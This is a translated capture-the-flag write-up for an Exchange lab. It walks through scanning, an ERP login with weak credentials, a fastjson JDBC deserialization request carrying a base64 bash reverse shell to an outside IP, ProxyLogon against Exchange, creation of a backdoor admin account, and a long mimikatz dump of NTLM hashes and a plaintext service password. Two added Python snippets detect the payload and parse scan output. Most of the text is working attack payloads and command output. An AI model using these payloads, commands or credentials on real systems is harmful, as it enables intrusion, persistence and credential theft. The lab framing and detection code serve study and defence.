春秋云镜 (Chunqiu Cloud Range): Exchange

This article was last updated on 2025.03.07

Penetration testing


flag01

Scan the target with fscan:

fscan -h 39.98.120.143

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.98.120.143:22 open
39.98.120.143:8000 open
39.98.120.143:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.98.120.143 code:200 len:19813 title:lumia
[*] WebTitle http://39.98.120.143:8000 code:302 len:0 title:None 跳转url: http://39.98.120.143:8000/login.html
[*] WebTitle http://39.98.120.143:8000/login.html code:200 len:5662 title:Lumia ERP

Port 8000 runs a 华夏 ERP (Huaxia ERP) CMS. The unauthenticated endpoint /user/getAllList;.ico can be used to retrieve password hashes, or you can simply log in to the backend with the weak credentials admin/123456.

Java code audit: Huaxia ERP CMS v2.3 - FreeBuf (网络安全行业门户)

Then use fastjson with a JDBC deserialization chain to get a shell.

At first I used evil-mysql-server; it could execute commands, but the reverse shell never connected back.

./evil-mysql-server -addr 3306 -java java -ysoserial ysoserial.jar

Later I switched to MySQL_Fake_Server, but it apparently only works on Python below 3.8. Fortunately someone has already fixed that: @coroutine has deprecated since python3.8

My MySQL_Fake_Server configuration file: [screenshot]

The HTTP request:

GET /depotHead/list?search={{url({
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "156.238.233.55",
"portToConnectTo": 3307,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
}
})}}&currentPage=1&pageSize=15 HTTP/1.1
Host: 39.98.108.119:8000
Cookie: JSESSIONID=3CE4BA50A38543F5F71B0562AE03D21C
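What this request looks like from the defender's side: the following Python check is an added example and is not part of the original post. It scans access-log lines for the indicators visible in the request above (a fastjson "@type" tag naming java.lang.AutoCloseable or com.mysql.jdbc.JDBC4Connection, a repeated "@type" key, Connector/J properties such as autoDeserialize, and the ysoserial-style "yso_<Gadget>_..." user field). The log lines are constructed inline; the command string is replaced by a placeholder and the connect-back host is a documentation address.

```python
import json
import re
from urllib.parse import parse_qs, quote, urlsplit

# Indicators taken from the request above: fastjson type tags that reach the JDBC
# gadget, Connector/J properties that make the driver deserialize server-supplied data,
# and the ysoserial-style "yso_<Gadget>_<cmd>" naming used for the user field.
TYPE_TAG_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
SUSPICIOUS_TYPES = {"java.lang.AutoCloseable", "com.mysql.jdbc.JDBC4Connection"}
SUSPICIOUS_PROPS = {"autoDeserialize", "statementInterceptors", "hostToConnectTo"}
GADGET_RE = re.compile(r"\byso_[A-Za-z0-9]+")

def make_log_line(path, params):
    """Build a constructed access-log line ("METHOD target status") with URL-encoded params."""
    qs = "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())
    return f"GET {path}?{qs} 200"

# Constructed samples: a normal search, and one shaped like the request above with the
# command payload replaced by a placeholder and 203.0.113.5 (documentation range) as host.
BENIGN_SEARCH = json.dumps({"number": "DH001"})
MALICIOUS_SEARCH = (
    '{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection",'
    '"hostToConnectTo":"203.0.113.5","portToConnectTo":3307,'
    '"info":{"user":"yso_CommonsCollections6_PLACEHOLDER","autoDeserialize":"true"}}'
)
SAMPLE_LOG = [
    make_log_line("/depotHead/list", {"search": BENIGN_SEARCH, "currentPage": "1", "pageSize": "15"}),
    make_log_line("/depotHead/list", {"search": MALICIOUS_SEARCH, "currentPage": "1", "pageSize": "15"}),
]

def inspect_request(line):
    """Return a list of findings for one access-log line; an empty list means nothing matched."""
    _method, target, _status = line.split(" ", 2)
    findings = []
    for param, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:                      # parse_qs has already URL-decoded the value
            types = TYPE_TAG_RE.findall(value)
            for t in types:
                if t in SUSPICIOUS_TYPES:
                    findings.append(f"{param}: fastjson @type {t}")
            if len(types) > 1:                    # fastjson honours a repeated @type key
                findings.append(f"{param}: repeated @type ({len(types)} tags)")
            for prop in sorted(SUSPICIOUS_PROPS):
                if f'"{prop}"' in value:
                    findings.append(f"{param}: JDBC property {prop}")
            m = GADGET_RE.search(value)
            if m:
                findings.append(f"{param}: gadget marker {m.group(0)}")
    return findings

def scan_log(lines):
    """Map line index -> findings for every line that produced at least one finding."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_request(line))}

if __name__ == "__main__":
    for i, findings in scan_log(SAMPLE_LOG).items():
        print(f"line {i}:")
        for item in findings:
            print("  -", item)
```

The check deliberately matches on the decoded parameter rather than on the raw URL, since the JSON arrives percent-encoded; the same indicators would be the starting point for a WAF rule, and the repeated-"@type" pattern is the one that survives even if the class names change.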



flag01: flag{8aaa35a9-9f53-417e-868f-1c53bc9aea9d}

flag02

Set up a proxy and scan the internal network:

./fscan -h 172.22.3.12/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.26 is alive
[*] Icmp alive hosts len is: 4
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:139 open
172.22.3.2:139 open
172.22.3.26:135 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.9:808 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.2:88 open
172.22.3.12:8000 open
172.22.3.9:8172 open
[*] alive ports len is: 18
start vulscan
[*] WebTitle http://172.22.3.12 code:200 len:19813 title:lumia
[*] NetInfo
[*]172.22.3.2
[->]XIAORANG-WIN16
[->]172.22.3.2
[*] NetInfo
[*]172.22.3.26
[->]XIAORANG-PC
[->]172.22.3.26
[*] NetInfo
[*]172.22.3.9
[->]XIAORANG-EXC01
[->]172.22.3.9
[*] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
[*] OsInfo 172.22.3.2 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.3.2 [+] DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
已完成 18/18
[*] 扫描结束,耗时: 10.903642768s

Let's see which hosts are in scope:

172.22.3.2    DC
172.22.3.9    XIAORANG-EXC01.xiaorang.lab (mail server)
172.22.3.12   external-facing host (already compromised)
172.22.3.26   XIAORANG\XIAORANG-PC
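The host list above was put together by reading the scan output by hand. The following Python parser is an added example, not part of the original writeup, that performs the same triage from fscan's text output: it collects alive hosts, open ports, NetBIOS names and OS strings, fscan's "[+] DC:" marker and the /owa/ redirect, and prints one line per host. The input is a constructed subset of the lines shown above; the role labels (domain controller, kerberos, exchange) are my own heuristics, not fscan's.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the lines from the fscan output above.
SAMPLE_SCAN = r"""
(icmp) Target 172.22.3.12 is alive
(icmp) Target 172.22.3.2 is alive
(icmp) Target 172.22.3.9 is alive
(icmp) Target 172.22.3.26 is alive
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.12:80 open
172.22.3.12:22 open
172.22.3.2:88 open
172.22.3.12:8000 open
[*] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
[*] NetBios 172.22.3.2 [+] DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.9 XIAORANG-EXC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive")
PORT_RE = re.compile(r"^(\d+(?:\.\d+){3}):(\d+) open$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+) (.+)$")
# fscan prints the redirect target after a Chinese label; it is matched verbatim here.
WEBTITLE_RE = re.compile(r"^\[\*\] WebTitle (\S+) .*?title:(.*?)(?: 跳转url: (\S+))?$")

def _new_host():
    return {"name": None, "os": None, "ports": set(), "roles": set(), "titles": []}

def parse_fscan(text):
    """Turn fscan's text output into {ip: {name, os, ports, roles, titles}}."""
    hosts = defaultdict(_new_host)
    for line in text.splitlines():
        line = line.strip()
        if m := ALIVE_RE.match(line):
            _ = hosts[m.group(1)]                      # register the host even with no ports
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := NETBIOS_RE.match(line):
            ip, rest = m.groups()
            host = hosts[ip]
            if "[+] DC:" in rest:                      # fscan flags domain controllers this way
                host["roles"].add("domain controller")
                rest = rest.split("DC:", 1)[1]
            parts = rest.split()
            host["name"] = parts[0]
            host["os"] = " ".join(parts[1:]) or None
        elif m := WEBTITLE_RE.match(line):
            url, title, redirect = m.groups()
            ip = re.search(r"://([\d.]+)", url).group(1)
            if title.strip() != "None":
                hosts[ip]["titles"].append(title.strip())
            if redirect and "/owa/" in redirect:      # Outlook Web Access means Exchange
                hosts[ip]["roles"].add("exchange (OWA)")
    for host in hosts.values():                        # corroborate roles from well-known ports
        if 88 in host["ports"]:
            host["roles"].add("kerberos (tcp/88)")
    return dict(hosts)

def summarize(hosts):
    """One line per host, sorted numerically by address."""
    def ip_key(ip):
        return tuple(int(o) for o in ip.split("."))
    lines = []
    for ip in sorted(hosts, key=ip_key):
        h = hosts[ip]
        ports = ",".join(str(p) for p in sorted(h["ports"])) or "-"
        roles = ", ".join(sorted(h["roles"])) or "-"
        lines.append(f"{ip:<14} {h['name'] or '?':<30} ports={ports} roles={roles}")
    return lines

if __name__ == "__main__":
    for line in summarize(parse_fscan(SAMPLE_SCAN)):
        print(line)
```

The same parser is useful on the defensive side: feeding it an authorised internal scan gives an inventory to compare against the asset register, and a host that shows up as "exchange (OWA)" or "domain controller" without being in the register is worth a look.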

172.22.3.9 is an Exchange server, so we attack it directly with ProxyLogon: FDlucifer/Proxy-Attackchain

proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

This gives SYSTEM privileges.


Add an account:

net user fffffilm Password@973 /add
net localgroup administrators fffffilm /add

RDP in and grab the flag.


flag02: flag{e27b65a6-f2fa-4c39-bc62-a3a606b28c1b}

flag04

Run mimikatz to dump the hashes:

C:\Users\fffffilm\Desktop>mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" exit

.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonPasswords

Authentication Id : 0 ; 2253980 (00000000:0022649c)
Session : RemoteInteractive from 2
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/1 20:16:35
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/1 20:14:52
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 111502 (00000000:0001b38e)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/1 20:14:52
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 23829 (00000000:00005d15)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/3/1 20:14:34
SID :
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
kerberos :
ssp :
[00000000]
* Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
* Domain : (null)
* Password : PyxY&2QQ)4rAM&3oiqdNxQ)3?3dR^oDMxtVr*zoHc}*x$MLtHk&O1^Gxm%wc{Sd=SZB|vH+$Kl{;]cIQLoEz/Y=?0qBWm2gj(i]Y5D-pk7N*h80Qh7x^}rwgD%!8PteC
[00000001]
* Username : HealthMailbox0d5918ea7298475bbbb7e3602e1e289d@xiaorang.lab
* Domain : (null)
* Password : PyxY&2QQ)4rAM&3oiqdNxQ)3?3dR^oDMxtVr*zoHc}*x$MLtHk&O1^Gxm%wc{Sd=SZB|vH+$Kl{;]cIQLoEz/Y=?0qBWm2gj(i]Y5D-pk7N*h80Qh7x^}rwgD%!8PteC
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/1 20:14:34
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 4334211 (00000000:00422283)
Session : RemoteInteractive from 3
User Name : fffffilm
Domain : XIAORANG-EXC01
Logon Server : XIAORANG-EXC01
Logon Time : 2025/3/1 20:22:54
SID : S-1-5-21-804691931-3750513266-524628342-1000
msv :
[00000003] Primary
* Username : fffffilm
* Domain : XIAORANG-EXC01
* NTLM : ad123012e39b20a80ebe424bff56e1b4
* SHA1 : 86bc9e9af57b6884802421251699bf41a1fc152a
tspkg :
wdigest :
* Username : fffffilm
* Domain : XIAORANG-EXC01
* Password : (null)
kerberos :
* Username : fffffilm
* Domain : XIAORANG-EXC01
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 2451634 (00000000:002568b2)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/1 20:16:42
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 437d8b20905f1cdf1d7bff8e8fe671ae
* SHA1 : 4493de617d0b29882718a4cab1662f243ca1fc44
* DPAPI : 6006f95be384bd230f627f6f5a2786a8
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 2052850 (00000000:001f52f2)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/1 20:16:28
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
ssp :
credman :

Authentication Id : 0 ; 65269 (00000000:0000fef5)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/1 20:14:50
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XIAORANG-EXC01$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/1 20:14:50
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xiaorang-exc01$
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 4334240 (00000000:004222a0)
Session : RemoteInteractive from 3
User Name : fffffilm
Domain : XIAORANG-EXC01
Logon Server : XIAORANG-EXC01
Logon Time : 2025/3/1 20:22:54
SID : S-1-5-21-804691931-3750513266-524628342-1000
msv :
[00000003] Primary
* Username : fffffilm
* Domain : XIAORANG-EXC01
* NTLM : ad123012e39b20a80ebe424bff56e1b4
* SHA1 : 86bc9e9af57b6884802421251699bf41a1fc152a
tspkg :
wdigest :
* Username : fffffilm
* Domain : XIAORANG-EXC01
* Password : (null)
kerberos :
* Username : fffffilm
* Domain : XIAORANG-EXC01
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 4326956 (00000000:0042062c)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/1 20:22:54
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
ssp :
credman :

Authentication Id : 0 ; 4326940 (00000000:0042061c)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/1 20:22:54
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
ssp :
credman :

Authentication Id : 0 ; 2051627 (00000000:001f4e2b)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/1 20:16:28
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* NTLM : 535602bb7f4523e2979148feee2cc749
* SHA1 : b39f4a0ec7de08a72d6e5dfcee3d844967136734
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XIAORANG-EXC01$
* Domain : xiaorang.lab
* Password : 68 72 cd d9 0e c4 5f 76 60 a8 a7 50 78 70 b0 9b be e1 93 10 98 c3 77 38 87 a2 f2 00 87 6a 23 b5 a1 73 cf d0 a7 ed d1 f0 b4 f6 83 8a 9f 14 0c f7 7e db 71 01 fd 6f 8e 90 3e db 8e 66 f0 c0 d1 bd 5c 1b fd 3d 5c f1 a1 cd 17 e4 86 51 b2 13 e1 99 2d 2b 74 b7 d7 02 8a 25 e2 94 ee 01 97 39 23 97 aa 00 82 37 f6 5f 61 4c 22 a5 f6 25 da 12 fb 87 4c 87 c5 0e 94 97 bb d7 1f d4 4c a9 9b 66 bc b7 e2 16 02 90 15 cf 08 90 cc 3c 8d dc e2 9d 76 43 0c 45 c0 11 f6 7e 34 c0 0d f2 23 c1 0d c2 d9 0b 7b 59 a8 aa cf 86 db cf 51 aa 0e 4c 29 a0 e5 aa d4 78 56 14 9a 56 81 bc 03 f7 5b d8 32 ac 5d 11 67 fa b8 a6 9f 4d 08 52 dc 5a be 2e 8a 4c 6a 8b 30 80 de b3 53 14 5c 3c 8a 55 2a f4 6f 45 ef b6 5b eb 55 36 7c 19 82 a5 f5 ff 30 95 07 3a ce 7f
ssp :
credman :

Authentication Id : 0 ; 1946225 (00000000:001db271)
Session : NetworkCleartext from 0
User Name : HealthMailbox0d5918e
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/1 20:16:24
SID : S-1-5-21-533686307-2117412543-4200729784-1136
msv :
[00000003] Primary
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* NTLM : 437d8b20905f1cdf1d7bff8e8fe671ae
* SHA1 : 4493de617d0b29882718a4cab1662f243ca1fc44
* DPAPI : 6006f95be384bd230f627f6f5a2786a8
tspkg :
wdigest :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : HealthMailbox0d5918e
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 111353 (00000000:0001b2f9)
Session : Service from 0
User Name : Zhangtong
Domain : XIAORANG
Logon Server : XIAORANG-WIN16
Logon Time : 2025/3/1 20:14:52
SID : S-1-5-21-533686307-2117412543-4200729784-1147
msv :
[00000003] Primary
* Username : Zhangtong
* Domain : XIAORANG
* NTLM : 22c7f81993e96ac83ac2f3f1903de8b4
* SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e
* DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b
tspkg :
wdigest :
* Username : Zhangtong
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : Zhangtong
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/1 20:14:50
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 65301 (00000000:0000ff15)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/1 20:14:50
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* NTLM : 9587463cfa3fd1ea760c401e2c52e224
* SHA1 : 162fc915ffccfa73c6f53b3c92f02690ccf7831c
tspkg :
wdigest :
* Username : XIAORANG-EXC01$
* Domain : XIAORANG
* Password : (null)
kerberos :
